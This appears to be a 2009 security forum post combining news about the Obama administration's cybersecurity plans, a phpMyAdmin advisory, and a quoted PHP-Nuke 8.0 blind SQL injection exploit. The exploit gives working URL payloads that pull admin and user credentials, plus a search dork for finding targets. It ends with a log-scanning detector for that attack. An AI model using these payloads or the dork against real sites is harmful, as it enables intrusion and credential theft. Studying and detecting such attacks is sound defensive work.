paxnWo
Posted January 22, 2009

Security Subscription

#23.01.2009

#3:

################# PHP-Nuke 8.0 Downloads Blind Sql Injection #################
#######################################################################################
##
##AUTHOR : Sina Yazdanmehr (R3d.W0rm)
##Discovered by : Sina Yazdanmehr (R3d.W0rm)
##Our Site : http://ircrash.com
##My Official WebSite : http://r3dw0rm.ir
##IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)
#######################################################################################
##Download : http://phpnuke.org
##
##Dork : inurl:modules.php?name=Downloads "PHP-Nuke"
##
#######################################################################################
[Bug]
##
##Admin Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker (at) devil (dot) net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker (at) devil (dot) net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Users Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker (at) devil (dot) net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
#Users Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker (at) devil (dot) net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
#
#######################################################################################
[Note]
##
##1. magic_quotes_gpc = Off
##2. register_globals = On
##3. For using bug you must login via a simple user.
##4. After using bug go to this url :
##http://[site]/[path]/modules.php?name=Downloads&d_op=Add&email=attacker@devil.net&title=zz&url=zz&description=zz
#5. I use ascii codes and null byte in url for bypass nuke security function
## please don't change ascii code and %00.
##
####################################### TNX GOD #######################################
#######################################################################################

#2:

In the homeland security document, [URL="http://www.whitehouse.gov/agenda/homeland_security/"]published on Thursday[/URL], the administration pledged to create a top cybersecurity position, harden the nation's infrastructure, fund research and development of secure computing technologies, and work with the private sector to set standards for cybersecurity. The document also promised that the administration will work with industry to develop better defenses against cyber espionage, shut down the mechanisms through which online criminals profit from their crimes, and mandate better privacy and breach disclosures.

The Obama administration will "declare the cyber infrastructure a strategic asset and establish the position of national cyber advisor who will report directly to the president and will be responsible for coordinating federal agency efforts and development of national cyber policy," the document stated.

Much of the strategy mirrors the recommendations sent to the administration by a group of industry, government and academic experts in cybersecurity. The [URL="http://www.securityfocus.com/news/11540"]94-page report on those recommendations[/URL], penned by the Commission on Cybersecurity for the 44th Presidency, stressed that the current U.S. administration needs to treat incursions into the nation's networks as a serious problem, akin to nuclear non-proliferation and combatting terrorism.
Indeed, the homeland security document puts cybersecurity as the fourth priority for the administration's security strategy, behind fighting terrorism, limiting the spread of nuclear weapons and preventing bio-weapon attacks and epidemics.

Only late in the previous administration, under former President George W. Bush, did the government make progress in establishing better security for government systems. Years of poor grades under the Federal Information Security Management Act (FISMA) [URL="http://www.securityfocus.com/brief/741"]did little to improve[/URL] information-technology security within federal agencies. Not until major attacks on government networks [URL="http://www.securityfocus.com/news/11472"]resulted in congressional hearings[/URL] did the administration take point on efforts to lock down computers.

In 2007, the Bush Administration [URL="http://www.securityfocus.com/news/11505"]launched[/URL] the Federal Desktop Core Configuration program and the Trusted Internet Connection initiative, and last year, President Bush signed the National Security Presidential Directive 54/Homeland Security Presidential Directive 23 [URL="http://www.securityfocus.com/news/11507"]creating the Comprehensive National Cybersecurity Initiative (CNCI)[/URL].

With the push for better cybersecurity, President Obama made good on campaign promises made last summer.

"As President, I'll make cyber security the top priority that it should be in the 21st century," he told people in West Lafayette, Ind., [URL="http://www.barackobama.com/2008/07/16/remarks_of_senator_barack_obam_95.php"]according to a transcript[/URL]. "I'll declare our cyber-infrastructure a strategic asset, and appoint a National Cyber Advisor who will report directly to me.
We'll coordinate efforts across the federal government, implement a truly national cyber-security policy, and tighten standards to secure information — from the networks that power the federal government, to the networks that you use in your personal lives."

Two days into his administration, U.S. President Barack Obama issued a statement outlining his homeland security policy, including the creation of a top advisor in the White House to set cybersecurity policy.

#1:

Date : January 23, 2009
Affected: Corporate 4.0
_______________________________________________________________________

Problem Description:

Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows remote attackers to inject arbitrary web script or HTML by using db script parameter when register_global php parameter is enabled (CVE-2008-4775).

Cross-site request forgery (CSRF) vulnerability in tbl_structure.php allows remote attackers to perform SQL injection and execute arbitrary code by using table script parameter (CVE-2008-5621).

Multiple cross-site request forgery (CSRF) vulnerabilities in allows remote attackers to perform SQL injection by using unknown vectors related to table script parameter (CVE-2008-5622).

Package : phpMyAdmin

I will keep updating my post to add new information. Do not post after me unless you feel the need.
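For the PHP-Nuke Downloads advisory (#3) quoted in this post: a log-review sketch, added here and not part of the original post or the advisory, that flags the request shape the advisory describes, namely a Downloads d_op=Add request whose url parameter carries a NUL byte, an SQL comment opener or an ascii(substring((select ...)) probe. The log lines, addresses and function names are constructed for the example, and the Apache combined log format is an assumption.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined format, documentation-range addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [23/Jan/2009:10:00:01 +0000] "GET /modules.php?name=Downloads&d_op=Add&title=1&description=1&email=a%40example.org&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=97%2F* HTTP/1.1" 200 5120
203.0.113.7 - - [23/Jan/2009:10:00:02 +0000] "GET /modules.php?name=Downloads&d_op=Add&title=1&description=1&email=a%40example.org&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=98%2F* HTTP/1.1" 200 5120
203.0.113.7 - - [23/Jan/2009:10:09:40 +0000] "GET /modules.php?name=Downloads&d_op=Add&email=a%40example.org&title=zz&url=zz&description=zz HTTP/1.1" 200 4096
198.51.100.20 - - [23/Jan/2009:10:12:00 +0000] "GET /modules.php?name=Downloads&d_op=Add&title=Tool&description=x&email=b%40example.org&url=http%3A%2F%2Fexample.org%2Ffile.zip HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')
# Indicators taken from the advisory's URLs: a NUL byte, an SQL comment
# opener, and a character-by-character ascii(substring((select ...)) probe.
INDICATORS = {
    "nul_byte": re.compile(r"\x00"),
    "sql_comment": re.compile(r"/\*"),
    "char_probe": re.compile(r"ascii\s*\(\s*substring\s*\(.*select", re.I | re.S),
}

def inspect_request(url):
    """Return the indicator names found in url= of a Downloads 'Add' request."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if query.get("name") != ["Downloads"] or query.get("d_op") != ["Add"]:
        return []
    value = " ".join(query.get("url", []))  # percent-decoded by parse_qs
    return [name for name, rx in INDICATORS.items() if rx.search(value)]

def scan(log_text):
    """Map client address -> Counter of indicators seen across its requests."""
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        found = inspect_request(m.group(2))
        if found:
            hits.setdefault(m.group(1), Counter()).update(found)
    return hits

if __name__ == "__main__":
    for client, counts in scan(SAMPLE_LOG).items():
        print(client, dict(counts))
```

Blind extraction needs one request per guessed character value, so a high char_probe count from a single logged-in client is the signal to triage first; the plain url=zz request from note 4 of the advisory is not flagged on its own.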